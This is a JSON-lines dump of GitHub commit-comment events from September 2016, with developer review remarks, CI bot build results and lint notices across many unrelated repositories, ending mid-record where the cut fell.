{"id":"4618590384","type":"CommitCommentEvent","actor":{"login":"dustingetz"},"repo":{"name":"luke-brown/luke-brown.github.io"},"payload":{"comment":{"id":19174501,"position":36,"line":36,"path":"anatomy.md","commit_id":"2707056ae47169452a9662c2ce1d057a71c1075e","created_at":"2016-09-26T15:37:54Z","updated_at":"2016-09-26T15:37:54Z","body":"this is interesting. i wonder what the minimum set of primitives is to evaluate math. Reminds me of the original lisp paper, the lisp interpreter in theory fits on a single piece of paper (http://www.michaelnielsen.org/ddi/lisp-as-the-maxwells-equations-of-software/) though i dont understand this spec. here is the original lisp paper from 1960: http://www-formal.stanford.edu/jmc/recursive.pdf"}},"created_at":"2016-09-26T15:37:54Z"}
{"id":"4618590731","type":"CommitCommentEvent","actor":{"login":"dustingetz"},"repo":{"name":"luke-brown/luke-brown.github.io"},"payload":{"comment":{"id":19174503,"position":44,"line":44,"path":"anatomy.md","commit_id":"2707056ae47169452a9662c2ce1d057a71c1075e","created_at":"2016-09-26T15:37:57Z","updated_at":"2016-09-26T15:37:57Z","body":"Thinking in terms of specifically the function abstraction, math doesn't need a series of translations, i can evaluate it in my head, and build up ever bigger maths."}},"created_at":"2016-09-26T15:37:57Z"}
{"id":"4618593334","type":"CommitCommentEvent","actor":{"login":"srfarias"},"repo":{"name":"Nougat-Surnia/android_device_motorola_msm8916-common"},"payload":{"comment":{"id":19174513,"position":null,"line":null,"path":null,"commit_id":"186f0ef057dce0aef8b68ce5dff64f8ed26b2136","created_at":"2016-09-26T15:38:22Z","updated_at":"2016-09-26T15:38:22Z","body":"https://review.cyanogenmod.org/#/c/163820/ \r\n\r\nlol"}},"created_at":"2016-09-26T15:38:22Z"}
{"id":"4618593573","type":"CommitCommentEvent","actor":{"login":"asymmetric"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19174514,"position":5,"line":104,"path":"probe/endpoint/procspy/background_reader_linux.go","commit_id":"56469e3425d77edbdc2eae3d1653a9827440bfa4","created_at":"2016-09-26T15:38:24Z","updated_at":"2016-09-26T15:38:24Z","body":"@alban @iaguis is there a risk of more than one `select` case being ready after this? i.e. could `walkc` or `tickc` also have data? If so, `select` chooses one at random, which is not so good.. :)"}},"created_at":"2016-09-26T15:38:24Z"}
{"id":"4618594097","type":"CommitCommentEvent","actor":{"login":"sangleganesh"},"repo":{"name":"portworx/kvdb"},"payload":{"comment":{"id":19174516,"position":44,"line":553,"path":"consul/kv_consul.go","commit_id":"b7f1d4664670abcf09e89d27763abcd8a985d269","created_at":"2016-09-26T15:38:30Z","updated_at":"2016-09-26T15:38:30Z","body":"Is it possible to update the snapshot test such that without this fix the test fails, but with the fix the test passes ?\r\nIt would help prevent regressions in future. "}},"created_at":"2016-09-26T15:38:30Z"}
{"id":"4618594771","type":"CommitCommentEvent","actor":{"login":"rickyschoolsFS"},"repo":{"name":"rickyschoolsFS/ListManagement"},"payload":{"comment":{"id":19174518,"position":null,"line":null,"path":null,"commit_id":"6b18483fe54307b7da7f8b6cbcf34d50e752b30d","created_at":"2016-09-26T15:38:38Z","updated_at":"2016-09-26T15:38:38Z","body":"#56 "}},"created_at":"2016-09-26T15:38:38Z"}
{"id":"4618598582","type":"CommitCommentEvent","actor":{"login":"Tatsuya79"},"repo":{"name":"libretro/beetle-pce-fast-libretro"},"payload":{"comment":{"id":19174528,"position":null,"line":null,"path":null,"commit_id":"aa98d9726db8292e7dfa5e14f3b1103d5b0eae3d","created_at":"2016-09-26T15:39:14Z","updated_at":"2016-09-26T15:39:14Z","body":"I'm not sure what this is trying to fix but it brakes the scanline menu and displays the picture off center for 352 pixels wide games.\r\n(small list of those games here: http://libretro.com/forums/showthread.php?t=5535&highlight=supergrafx )"}},"created_at":"2016-09-26T15:39:14Z"}
{"id":"4618602538","type":"CommitCommentEvent","actor":{"login":"ramach"},"repo":{"name":"akon-dey/ground"},"payload":{"comment":{"id":19174539,"position":null,"line":null,"path":null,"commit_id":"c38b27b89f1834513b3440e27c8db240185b4df1","created_at":"2016-09-26T15:39:52Z","updated_at":"2016-09-26T15:39:52Z","body":"Most recent changes address the following\r\n\r\n- use new ground-core API\r\n  preliminary changes to create tombstone node (fix annotations)\r\n  now we have create, get and dropTable, create, get and drop table, create, get partitions"}},"created_at":"2016-09-26T15:39:52Z"}
{"id":"4618602860","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"seninp-bioinfo/MetaComp"},"payload":{"comment":{"id":19174541,"position":null,"line":null,"path":null,"commit_id":"aac36f1b718010f64f65d43d0548845a8a2c861f","created_at":"2016-09-26T15:39:56Z","updated_at":"2016-09-26T15:39:56Z","body":"[R/convert_to_taxa_table.R:103:1:](https://github.com/seninp-bioinfo/MetaComp/blob/aac36f1b718010f64f65d43d0548845a8a2c861f/R/convert_to_taxa_table.R#L103) *style:* **lines should not be more than 100 characters.**\n```r\n​        # get parent_taxID and loop through until parent_taxID doesnt equal to 131567 (highest classification)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2016-09-26T15:39:56Z"}
{"id":"4618603354","type":"CommitCommentEvent","actor":{"login":"anfranken"},"repo":{"name":"dzhw/data-supplements"},"payload":{"comment":{"id":19174544,"position":null,"line":null,"path":null,"commit_id":"17365261217964707949ad90066801c1b27cc7f0","created_at":"2016-09-26T15:40:01Z","updated_at":"2016-09-26T15:40:01Z","body":"#1 "}},"created_at":"2016-09-26T15:40:01Z"}
{"id":"4618603607","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19174545,"position":16,"line":526,"path":"cura/BuildVolume.py","commit_id":"8e07a94d685e7d155a63c740592a319a3da24729","created_at":"2016-09-26T15:40:03Z","updated_at":"2016-09-26T15:40:03Z","body":"You should take the maximum of travel avoid distance and skirt/brim size, rather than add the two together, since the travel avoid radius and the infill wipe are counted both as distances from the mesh, rather than as distances from the skirt or brim."}},"created_at":"2016-09-26T15:40:03Z"}
{"id":"4618612355","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19174566,"position":null,"line":null,"path":null,"commit_id":"658462ad126fa6a38ae51b783cab0e454a749554","created_at":"2016-09-26T15:41:27Z","updated_at":"2016-09-26T15:41:27Z","body":"Related to: backdrop/backdrop-issues#2218 "}},"created_at":"2016-09-26T15:41:27Z"}
{"id":"4618633907","type":"CommitCommentEvent","actor":{"login":"SimZor"},"repo":{"name":"AsYetUntitled/Framework"},"payload":{"comment":{"id":19174610,"position":null,"line":null,"path":null,"commit_id":"392bc642a35748f5687a1b853c81d17b173dbdcd","created_at":"2016-09-26T15:44:43Z","updated_at":"2016-09-26T15:44:43Z","body":"Shall I change this on my current version 4.4r3? What does it fix?"}},"created_at":"2016-09-26T15:44:43Z"}
{"id":"4618634247","type":"CommitCommentEvent","actor":{"login":"Nilesh5"},"repo":{"name":"Nilesh5/hello-world"},"payload":{"comment":{"id":19174612,"position":null,"line":null,"path":null,"commit_id":"745e8b18f1404d78d41777cb4ec1954b14f7dfd2","created_at":"2016-09-26T15:44:47Z","updated_at":"2016-09-26T15:44:47Z","body":"Testing in Git"}},"created_at":"2016-09-26T15:44:47Z"}
{"id":"4618634935","type":"CommitCommentEvent","actor":{"login":"wchen-r7"},"repo":{"name":"rapid7/metasploit-framework"},"payload":{"comment":{"id":19174613,"position":null,"line":null,"path":null,"commit_id":"9d01f24cff54f6f1bcd61eb1c13a01d426c0df8b","created_at":"2016-09-26T15:44:51Z","updated_at":"2016-09-26T15:44:51Z","body":"The correct PR number for the landing message should be: #7338"}},"created_at":"2016-09-26T15:44:51Z"}
{"id":"4618636362","type":"CommitCommentEvent","actor":{"login":"grahamc"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19174619,"position":null,"line":null,"path":null,"commit_id":"6776882b302dd7a58f14cf3e5451e9bb7d302c47","created_at":"2016-09-26T15:45:07Z","updated_at":"2016-09-26T15:45:07Z","body":"Looks like all these `unknown` licenses are failing to evaluate."}},"created_at":"2016-09-26T15:45:07Z"}
{"id":"4618636755","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19174620,"position":null,"line":null,"path":null,"commit_id":"f138a83d07a7d66dd0d58790ef73e9bee662845f","created_at":"2016-09-26T15:45:11Z","updated_at":"2016-09-26T15:45:11Z","body":"Related to: backdrop/backdrop-issues#2233 "}},"created_at":"2016-09-26T15:45:11Z"}
{"id":"4618639258","type":"CommitCommentEvent","actor":{"login":"zhongwulai"},"repo":{"name":"AstraZeneca-NGS/VarDict"},"payload":{"comment":{"id":19174624,"position":null,"line":null,"path":null,"commit_id":"5f883061263a0de2575416a728cb2b3e7fa82b15","created_at":"2016-09-26T15:45:34Z","updated_at":"2016-09-26T15:45:34Z","body":"@mjafin Except for CRISPR feature, I've made same updates for VarDictJava in Github."}},"created_at":"2016-09-26T15:45:34Z"}
{"id":"4618639672","type":"CommitCommentEvent","actor":{"login":"jfalcou"},"repo":{"name":"NumScale/boost.simd"},"payload":{"comment":{"id":19174625,"position":129,"line":307,"path":"doc/Doxyfile.in","commit_id":"28967618379307a7663b84ce8633b91aa006e7be","created_at":"2016-09-26T15:45:38Z","updated_at":"2016-09-26T15:45:38Z","body":"why are those commented ?"}},"created_at":"2016-09-26T15:45:38Z"}
{"id":"4618642212","type":"CommitCommentEvent","actor":{"login":"kreeger"},"repo":{"name":"ovenbits/ModelRocket"},"payload":{"comment":{"id":19174632,"position":8,"line":31,"path":"Sources/JSONTransformable.swift","commit_id":"a238a56d1ea5b24db7d573d2a4382a8890f01165","created_at":"2016-09-26T15:46:03Z","updated_at":"2016-09-26T15:46:03Z","body":"Here's what I'm doing:\r\n\r\n```\r\nextension ParentClass: JSONTransformable {\r\n    static func from(json: JSON) -> ParentClass {\r\n        switch json[\"type\"].string {\r\n        case .some(\"header\"):\r\n            return HeaderClass(json: json)\r\n        case .some(\"image\"):\r\n            return ImageClass(json: json)\r\n        case .some(\"page\"):\r\n            return PageClass(json: json)\r\n        case .some(\"text\"):\r\n            return TextClass(json: json)\r\n        case .some(\"video\"):\r\n            return VideoClass(json: json)\r\n        default:\r\n            return ParentClass(json: json)\r\n        }\r\n    }\r\n}\r\n```"}},"created_at":"2016-09-26T15:46:03Z"}
{"id":"4618647387","type":"CommitCommentEvent","actor":{"login":"snicoll"},"repo":{"name":"spring-io/initializr"},"payload":{"comment":{"id":19174639,"position":7,"line":22,"path":"initializr-web/src/test/groovy/io/spring/initializr/web/support/SpringBootMetadataReaderTests.groovy","commit_id":"13e6ec44314bc54075de0d13fc29a78271368cc9","created_at":"2016-09-26T15:46:56Z","updated_at":"2016-09-26T15:46:56Z","body":"Well you changed the order (bottom to top)"}},"created_at":"2016-09-26T15:46:56Z"}
{"id":"4618648882","type":"CommitCommentEvent","actor":{"login":"ccharly"},"repo":{"name":"NumScale/boost.simd"},"payload":{"comment":{"id":19174645,"position":129,"line":307,"path":"doc/Doxyfile.in","commit_id":"28967618379307a7663b84ce8633b91aa006e7be","created_at":"2016-09-26T15:47:09Z","updated_at":"2016-09-26T15:47:09Z","body":"They actually are the same, I was just lazy and wanted to leave as it was before the refactor. We can delete them if you wish."}},"created_at":"2016-09-26T15:47:09Z"}
{"id":"4618649460","type":"CommitCommentEvent","actor":{"login":"sinscary"},"repo":{"name":"ankushTripathi/academia-api"},"payload":{"comment":{"id":19174647,"position":3,"line":3,"path":"server.js","commit_id":"c3697f81e6bfc92751df23e2e8f0329ecc5df495","created_at":"2016-09-26T15:47:13Z","updated_at":"2016-09-26T15:47:13Z","body":"We might not be using mongoose here, try using native mongodb driver or mongo factory"}},"created_at":"2016-09-26T15:47:13Z"}
{"id":"4618649802","type":"CommitCommentEvent","actor":{"login":"jasonliul"},"repo":{"name":"henrypp/wfptool"},"payload":{"comment":{"id":19174649,"position":null,"line":null,"path":null,"commit_id":"95f761285065005ec7d566d46215b0219e87b144","created_at":"2016-09-26T15:47:17Z","updated_at":"2016-09-26T15:47:17Z","body":"Someone found a translate error, i update it.\r\n\r\n"}},"created_at":"2016-09-26T15:47:17Z"}
{"id":"4618652173","type":"CommitCommentEvent","actor":{"login":"dlespiau"},"repo":{"name":"01org/cc-oci-runtime"},"payload":{"comment":{"id":19174653,"position":6,"line":6,"path":"tests/data/state-mounts-no-mount-destination.json","commit_id":"1008fe25b177996a7ed2600d0eeec1fca2552d31","created_at":"2016-09-26T15:47:37Z","updated_at":"2016-09-26T15:47:37Z","body":"Here and below, there no '/' between cc-oci-runtime and foo, could it be a problem?"}},"created_at":"2016-09-26T15:47:37Z"}
{"id":"4618655247","type":"CommitCommentEvent","actor":{"login":"jjneely"},"repo":{"name":"ipstatic/alertmanager"},"payload":{"comment":{"id":19174660,"position":4,"line":213,"path":"template/template.go","commit_id":"0c327d2a60cd63ca47596d558ea0eb8223b14e32","created_at":"2016-09-26T15:48:06Z","updated_at":"2016-09-26T15:48:06Z","body":"Can this be adjusted to follow the Go comment guidelines?\r\n\r\nhttps://golang.org/doc/effective_go.html#commentary"}},"created_at":"2016-09-26T15:48:06Z"}
{"id":"4618660079","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19174667,"position":null,"line":null,"path":null,"commit_id":"3e0522667448484a65559c91f00245763dd2a57c","created_at":"2016-09-26T15:48:51Z","updated_at":"2016-09-26T15:48:51Z","body":"ASIHP-validation1 (shenb) - Win64-Windows-7-VisualStudio-12: OK (2325 of 2339 tests passed, 558 test warnings)\n\n * 572 tests had: AUD diffs.\n * 18 tests had: EIO diffs.\n * 8 tests had: ESO small diffs.\n * 10 tests had: ESO big diffs.\n * 4 tests had: MTR big diffs.\n * 12 tests had: Table big diffs.\n * 2 tests had: ERR diffs.\n * 15 tests had: RDD diffs.\n * 1 test had: MTD diffs.\n * 18 tests had: Table small diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ small diffs.\n * 2 tests had: MTR small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3e0522667448484a65559c91f00245763dd2a57c-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3e0522667448484a65559c91f00245763dd2a57c-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.4%25-yellow.svg)</a> \n"}},"created_at":"2016-09-26T15:48:51Z"}
{"id":"4618662151","type":"CommitCommentEvent","actor":{"login":"ITBlackwood"},"repo":{"name":"Signmark/ATMTA-Station"},"payload":{"comment":{"id":19174671,"position":null,"line":null,"path":null,"commit_id":"75b3fc9ec9ea2347f2a43429c5b6e7d514fb41c6","created_at":"2016-09-26T15:49:11Z","updated_at":"2016-09-26T15:49:11Z","body":"Делаю иконки рабочими."}},"created_at":"2016-09-26T15:49:11Z"}
{"id":"4618662371","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/electron-squirrel-startup"},"payload":{"comment":{"id":19174672,"position":null,"line":null,"path":null,"commit_id":"4df0f9c30583d16fb659ab6a9586153a1e2014c4","created_at":"2016-09-26T15:49:13Z","updated_at":"2016-09-26T15:49:13Z","body":"++"}},"created_at":"2016-09-26T15:49:13Z"}
{"id":"4618663525","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/windows-installer"},"payload":{"comment":{"id":19174675,"position":null,"line":null,"path":null,"commit_id":"060360e4356562742eda288952c2222613b961d4","created_at":"2016-09-26T15:49:24Z","updated_at":"2016-09-26T15:49:24Z","body":"++"}},"created_at":"2016-09-26T15:49:24Z"}
{"id":"4618667182","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19174681,"position":null,"line":null,"path":null,"commit_id":"3e0522667448484a65559c91f00245763dd2a57c","created_at":"2016-09-26T15:49:58Z","updated_at":"2016-09-26T15:49:58Z","body":"ASIHP-validation1 (shenb) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1767 of 1767 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3e0522667448484a65559c91f00245763dd2a57c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3e0522667448484a65559c91f00245763dd2a57c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3e0522667448484a65559c91f00245763dd2a57c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.14%25-green.svg)</a>\n"}},"created_at":"2016-09-26T15:49:58Z"}
{"id":"4618670368","type":"CommitCommentEvent","actor":{"login":"sandy081"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":19174688,"position":null,"line":null,"path":null,"commit_id":"c844c6513505e1ea6fb52a07f5251f46af3d9445","created_at":"2016-09-26T15:50:30Z","updated_at":"2016-09-26T15:50:30Z","body":"Implementing #11937 \r\n\r\nWhile updating (manual/auto) an extension \r\n- If it is installed with dependencies, update will install new dependencies if added"}},"created_at":"2016-09-26T15:50:30Z"}
{"id":"4618672400","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19174696,"position":null,"line":null,"path":null,"commit_id":"3e0522667448484a65559c91f00245763dd2a57c","created_at":"2016-09-26T15:50:51Z","updated_at":"2016-09-26T15:50:51Z","body":"ASIHP-validation1 (shenb) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3e0522667448484a65559c91f00245763dd2a57c-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-26T15:50:51Z"}
{"id":"4618672520","type":"CommitCommentEvent","actor":{"login":"lpugin"},"repo":{"name":"rism-ch/verovio"},"payload":{"comment":{"id":19174697,"position":null,"line":null,"path":null,"commit_id":"2db4a5772f0a2cd6cc379c718836dd4285dff3df","created_at":"2016-09-26T15:50:52Z","updated_at":"2016-09-26T15:50:52Z","body":"Thanks"}},"created_at":"2016-09-26T15:50:52Z"}
{"id":"4618675091","type":"CommitCommentEvent","actor":{"login":"gregory38"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":19174709,"position":null,"line":null,"path":null,"commit_id":"be9995bd1e1190321969c89e2bbc5914a19a8f41","created_at":"2016-09-26T15:51:17Z","updated_at":"2016-09-26T15:51:17Z","body":"Yes someone told me that on forum too. This crash will be killer to fix."}},"created_at":"2016-09-26T15:51:17Z"}
{"id":"4618676656","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"taskcluster/taskcluster-github"},"payload":{"comment":{"id":19174710,"position":null,"line":null,"path":null,"commit_id":"6507044f51ae8f07d9c89829abe019ab19474729","created_at":"2016-09-26T15:51:33Z","updated_at":"2016-09-26T15:51:33Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#YG9gWPtsTnuFumeP-ChCMA"}},"created_at":"2016-09-26T15:51:33Z"}
{"id":"4618676691","type":"CommitCommentEvent","actor":{"login":"BoGuu"},"repo":{"name":"AsYetUntitled/Framework"},"payload":{"comment":{"id":19174711,"position":null,"line":null,"path":null,"commit_id":"392bc642a35748f5687a1b853c81d17b173dbdcd","created_at":"2016-09-26T15:51:33Z","updated_at":"2016-09-26T15:51:33Z","body":"No"}},"created_at":"2016-09-26T15:51:33Z"}
{"id":"4618678644","type":"CommitCommentEvent","actor":{"login":"zenkhas"},"repo":{"name":"traex/RippleEffect"},"payload":{"comment":{"id":19174716,"position":null,"line":null,"path":null,"commit_id":"df5f9e4456eae8a8e98e2827a3c6f9e7185596e1","created_at":"2016-09-26T15:51:52Z","updated_at":"2016-09-26T15:51:52Z","body":"Waiting for this release. Just ran into same problem."}},"created_at":"2016-09-26T15:51:52Z"}
{"id":"4618680789","type":"CommitCommentEvent","actor":{"login":"Jawshy"},"repo":{"name":"AsYetUntitled/Framework"},"payload":{"comment":{"id":19174718,"position":null,"line":null,"path":null,"commit_id":"392bc642a35748f5687a1b853c81d17b173dbdcd","created_at":"2016-09-26T15:52:13Z","updated_at":"2016-09-26T15:52:13Z","body":"> What does it fix? \r\n\r\nhttps://github.com/AsYetUntitled/Framework/pull/106. \r\n"}},"created_at":"2016-09-26T15:52:13Z"}
{"id":"4618682655","type":"CommitCommentEvent","actor":{"login":"KinnusJarkki"},"repo":{"name":"KinnusJarkki/Unity-2d-platform-game"},"payload":{"comment":{"id":19174722,"position":null,"line":null,"path":null,"commit_id":"bc9e66fb693906f40ab9f92fca266b27e5e9ce2e","created_at":"2016-09-26T15:52:30Z","updated_at":"2016-09-26T15:52:30Z","body":"![ground objects](https://cloud.githubusercontent.com/assets/22443383/18841379/361a59ac-841a-11e6-8a4e-0724aeb36d21.png)\r\n"}},"created_at":"2016-09-26T15:52:30Z"}
{"id":"4618683905","type":"CommitCommentEvent","actor":{"login":"ascchrvalstr"},"repo":{"name":"Infinideastudio/Infinideastudio-Frameworks"},"payload":{"comment":{"id":19174723,"position":null,"line":null,"path":null,"commit_id":"698e9d192fde627eafb7fde8363863efb369c8f2","created_at":"2016-09-26T15:52:43Z","updated_at":"2016-09-26T15:52:43Z","body":"为什么要用squash merge？\r\n版本历史全丢了"}},"created_at":"2016-09-26T15:52:43Z"}
{"id":"4618686868","type":"CommitCommentEvent","actor":{"login":"jlandon"},"repo":{"name":"ovenbits/ModelRocket"},"payload":{"comment":{"id":19174730,"position":8,"line":31,"path":"Sources/JSONTransformable.swift","commit_id":"a238a56d1ea5b24db7d573d2a4382a8890f01165","created_at":"2016-09-26T15:53:10Z","updated_at":"2016-09-26T15:53:10Z","body":"Instead of returning `ParentClass`, have you tried returning `Self`?"}},"created_at":"2016-09-26T15:53:10Z"}
{"id":"4618688194","type":"CommitCommentEvent","actor":{"login":"gregory38"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":19174733,"position":null,"line":null,"path":null,"commit_id":"be9995bd1e1190321969c89e2bbc5914a19a8f41","created_at":"2016-09-26T15:53:22Z","updated_at":"2016-09-26T15:53:22Z","body":"@ghikya \r\nhttps://www.youtube.com/watch?v=UNuhWBs8RiA"}},"created_at":"2016-09-26T15:53:22Z"}
{"id":"4618690296","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimExchange"},"payload":{"comment":{"id":19174737,"position":null,"line":null,"path":null,"commit_id":"4dd74ddb9e2ab8a7a29f0abe169a789248ca1eee","created_at":"2016-09-26T15:53:43Z","updated_at":"2016-09-26T15:53:43Z","body":"TeamCity Xbim :: Xbim Exchange :: XbimExchange [Build 184](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1234&buildTypeId=Xbim_XbimExchange_XbimExchange) is now running\n"}},"created_at":"2016-09-26T15:53:43Z"}
{"id":"4618691381","type":"CommitCommentEvent","actor":{"login":"HeinPauwelyn"},"repo":{"name":"HeinPauwelyn/AndroidDev"},"payload":{"comment":{"id":19174739,"position":null,"line":null,"path":null,"commit_id":"1884ed43914b88503ad3e3e7f50cc4674608d8a2","created_at":"2016-09-26T15:53:54Z","updated_at":"2016-09-26T15:53:54Z","body":"brainstorm 26/09/2016 over wat we gingen doen."}},"created_at":"2016-09-26T15:53:54Z"}
{"id":"4618691976","type":"CommitCommentEvent","actor":{"login":"amauric30"},"repo":{"name":"polieduco/preguntasrespuestas20162"},"payload":{"comment":{"id":19174741,"position":null,"line":null,"path":null,"commit_id":"050b59efec74c79e71dc5c4d9f0362c21f681c2b","created_at":"2016-09-26T15:54:00Z","updated_at":"2016-09-26T15:54:00Z","body":"hola Julian ya cambie la cuenta de e mail en GitHub mi nueva cuenta es amauric30@gmail.com"}},"created_at":"2016-09-26T15:54:00Z"}
{"id":"4618692588","type":"CommitCommentEvent","actor":{"login":"Thoughtscript"},"repo":{"name":"Thoughtscript/demo-json_table"},"payload":{"comment":{"id":19174744,"position":null,"line":null,"path":null,"commit_id":"6b75808778bb8e07c92692d009093d6c11c17181","created_at":"2016-09-26T15:54:06Z","updated_at":"2016-09-26T15:54:06Z","body":"Just a note - am weaving between interviews and conversations with Recruiters... time between commits is not a good indicator of actual time spent - this took 25 minutes"}},"created_at":"2016-09-26T15:54:06Z"}
{"id":"4618694255","type":"CommitCommentEvent","actor":{"login":"sarasafavi"},"repo":{"name":"sarasafavi/django-osgeo-importer"},"payload":{"comment":{"id":19174749,"position":4,"line":3,"path":"osgeo_importer/api.py","commit_id":"749c9561168df36cc2ca363bd26911b920909c4d","created_at":"2016-09-26T15:54:22Z","updated_at":"2016-09-26T15:54:22Z","body":"Minor flake8 bug; BooleanField imported but not used"}},"created_at":"2016-09-26T15:54:22Z"}
{"id":"4618695489","type":"CommitCommentEvent","actor":{"login":"ilya-g"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19174753,"position":8,"line":0,"path":"libraries/stdlib/src/kotlin/util/KotlinVersion.kt","commit_id":"5e70ebede1a0993dd2d5b2ae03ee6c73062dc652","created_at":"2016-09-26T15:54:34Z","updated_at":"2016-09-26T15:54:34Z","body":"|`line 13`|\n|---|\n\"256 ought to be enough for anybody\""}},"created_at":"2016-09-26T15:54:34Z"}
{"id":"4618697981","type":"CommitCommentEvent","actor":{"login":"aikar"},"repo":{"name":"PaperMC/Paper"},"payload":{"comment":{"id":19174755,"position":null,"line":null,"path":null,"commit_id":"d3eb13d60dad0ea895ea8eef73216dae955a3fba","created_at":"2016-09-26T15:54:59Z","updated_at":"2016-09-26T15:54:59Z","body":"I don't remember, I just know that I had to add this to my server as a player couldn't login "}},"created_at":"2016-09-26T15:54:59Z"}
{"id":"4618698174","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimExchange"},"payload":{"comment":{"id":19174756,"position":null,"line":null,"path":null,"commit_id":"4dd74ddb9e2ab8a7a29f0abe169a789248ca1eee","created_at":"2016-09-26T15:55:01Z","updated_at":"2016-09-26T15:55:01Z","body":"TeamCity Xbim :: Xbim Exchange :: XbimExchange [Build 184](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1234&buildTypeId=Xbim_XbimExchange_XbimExchange) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:01:19"}},"created_at":"2016-09-26T15:55:01Z"}
{"id":"4618699524","type":"CommitCommentEvent","actor":{"login":"windoc95"},"repo":{"name":"windoc95/cenderamataaf.github.io"},"payload":{"comment":{"id":19174759,"position":3,"line":1,"path":"CNAME","commit_id":"adb30fab3e73a29c53fc0a9f8c665832333c151c","created_at":"2016-09-26T15:55:13Z","updated_at":"2016-09-26T15:55:13Z","body":"cenderamataaf.com"}},"created_at":"2016-09-26T15:55:13Z"}
{"id":"4618705561","type":"CommitCommentEvent","actor":{"login":"andrewarrow"},"repo":{"name":"andrewarrow/paradise_ftp"},"payload":{"comment":{"id":19174778,"position":null,"line":null,"path":null,"commit_id":"a468505bea391a8db659d7b74eba86884a94aeac","created_at":"2016-09-26T15:56:10Z","updated_at":"2016-09-26T15:56:10Z","body":"ohh i see I see. cool. thank you! I'll move this back to paradise soon."}},"created_at":"2016-09-26T15:56:10Z"}
{"id":"4618706521","type":"CommitCommentEvent","actor":{"login":"kreeger"},"repo":{"name":"ovenbits/ModelRocket"},"payload":{"comment":{"id":19174782,"position":8,"line":31,"path":"Sources/JSONTransformable.swift","commit_id":"a238a56d1ea5b24db7d573d2a4382a8890f01165","created_at":"2016-09-26T15:56:20Z","updated_at":"2016-09-26T15:56:20Z","body":"@jlandon oh yeah, my bad. I've tried changing that to `Self?` instead of `ParentClass` and it still won't compile. On each return statement of my `switch` block, I get errors like\r\n\r\n```\r\nCannot convert return expression of type `HeaderClass` to return type `Self?`\r\n```"}},"created_at":"2016-09-26T15:56:20Z"}
{"id":"4618708518","type":"CommitCommentEvent","actor":{"login":"kyleeardley"},"repo":{"name":"kyleeardley/PriorityQueue"},"payload":{"comment":{"id":19174799,"position":13,"line":13,"path":"app.js","commit_id":"489d0e4fd3591ac695b73b12ed0b73e3c5e4b425","created_at":"2016-09-26T15:56:37Z","updated_at":"2016-09-26T15:56:37Z","body":"Ok great, I'll look at this again tonight.\n\nOn Mon, Sep 26, 2016 at 8:25 AM, anthonywittig <notifications@github.com>\nwrote:\n\n> Being able to click on an item and have it remove it is ok, but it should\n> follow the same runtime complexity constraint as the originally proposed\n> remove method (or add a remove method).\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/kyleeardley/PriorityQueue/commit/489d0e4fd3591ac695b73b12ed0b73e3c5e4b425#commitcomment-19173326>,\n> or mute the thread\n> 